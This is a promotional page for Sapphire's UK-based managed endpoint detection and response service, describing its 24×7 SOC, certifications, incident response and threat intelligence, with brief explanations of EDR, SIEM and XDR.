The Sapphire managed service provides 24×7 visibility of attempted malicious endpoint incursions. By combining automated detection and analysis with industry-leading threat intelligence feeds and remote remediation, security teams can operate safely in the knowledge that devices are secure.
Alert: Enterprise-wide visibility on all endpoint devices using advanced behavioural techniques combined with granular interrogation allows for dynamic mapping of attacks in each organisation’s environment.
Responsive: Friction-free isolation of infected systems, black-listing malicious files, and forensics collection for further analysis and mitigation.
Managed: 24 x 7 endpoint detection management frees up the security team to focus on core competencies, allowing them to address long-term security strategy and report to senior stakeholders.
The Sapphire SOC is based in the UK for both operations and storage of security data. Both our SOC and data centre are built on a fully redundant and highly available architecture to ensure zero data loss and continual service operation. Customer data is secured in our Tier 4 datacentre and compliant with ISO 27001, Cyber Essentials+, PCI DSS, CSA Star, ISO14001 and ISO9001.
Our team is experienced in multiple technical disciplines. Our analysts are further supported by our SOC Manager and a 24×7 Helpdesk team, as well as comprehensive premium support from technology providers. Analysts are accredited and certified with each technology provider to ensure the best possible service for our customers.
We provide a Global Incident Response (IR) service to enhance our ability to support customers at a time of critical attack or compromise. We integrate global threat intelligence data into our SOC, giving analysts an enriched view of existing, new and emerging threat actors and attack vectors on a minute by minute basis. Customers benefit from understanding how threats detected within their local environment relate to a global view.
Our SOC provides a range of additional managed security services such as vulnerability management and Managed SIEM services. Managed EDR customers can benefit from this, as threat intelligence curated from these services is shared with our EDR service.
Our Analysts will use our Managed EDR tools to examine threats for root cause, considering the threat vector, protocols, known bad actors and threat intelligence data to determine how threats have manifested and caused security incidents. This information is included as case evidence and shared with our customers.
The Sapphire SOC provides a range of mitigation responses to clients to ensure known and understood threats can be quickly contained or eliminated through either automated or manual response functions.
Endpoint detection and response (EDR) is a security solution that combines endpoint data collection and real-time monitoring for threats with analysis capabilities and automatic remediation.
Endpoint Detection and Response provides comprehensive real-time endpoint visibility to understand malicious activity. An agent monitors events for malicious behaviours using machine learning and ‘known bad’ signatures. EDR solutions are also essential for threat hunting.
EDR and SIEM complement each other. A SIEM will consume data from EDR and feed it into an aggregated single-view of risk, acting as a centralised point of management.
Endpoint security is vital because end-user devices such as laptops, desktops, and mobile devices are often a landing point for an attacker looking to steal data or move laterally.
An endpoint agent is installed on a device to monitor and alert on potentially malicious actions.
An Extended Detection and Response (XDR) solution takes a broader view than EDR, monitoring malicious actions into the email, cloud, etc.